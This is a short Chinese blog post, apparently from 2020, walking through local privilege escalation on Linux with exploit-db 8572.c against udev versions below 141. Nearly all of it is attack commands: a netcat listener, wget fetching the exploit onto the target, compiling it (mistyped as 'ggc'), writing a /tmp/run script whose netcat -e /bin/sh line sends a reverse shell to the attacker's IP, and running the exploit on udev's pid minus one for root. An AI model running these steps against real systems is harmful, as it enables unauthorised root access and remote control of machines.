8572.c提权

*该操作只能在udev版本低于141下进行

udevadm --version    查看udev版本

 

本机操作

nc -lvp 4444       开启4444端口监听

 

目标机操作

wget 'http://www.exploit-db.com/download/8572'
#下载8572.c文件

ggc 8572.c -o exploit
#将文件编译

echo '#!/bin/sh' > /tmp/run
echo '/bin/netcat -e /bin/sh IP地址 4444' >> /tmp/run
#在/tmp目录下写入run文件

ps -edf |grep udev
#查看root的pid号

./exploit pid-1
#执行pid号-1反弹回root的shell

 

 

posted @ 2020-06-24 14:50  f1veseven  阅读(502)  评论(0编辑  收藏  举报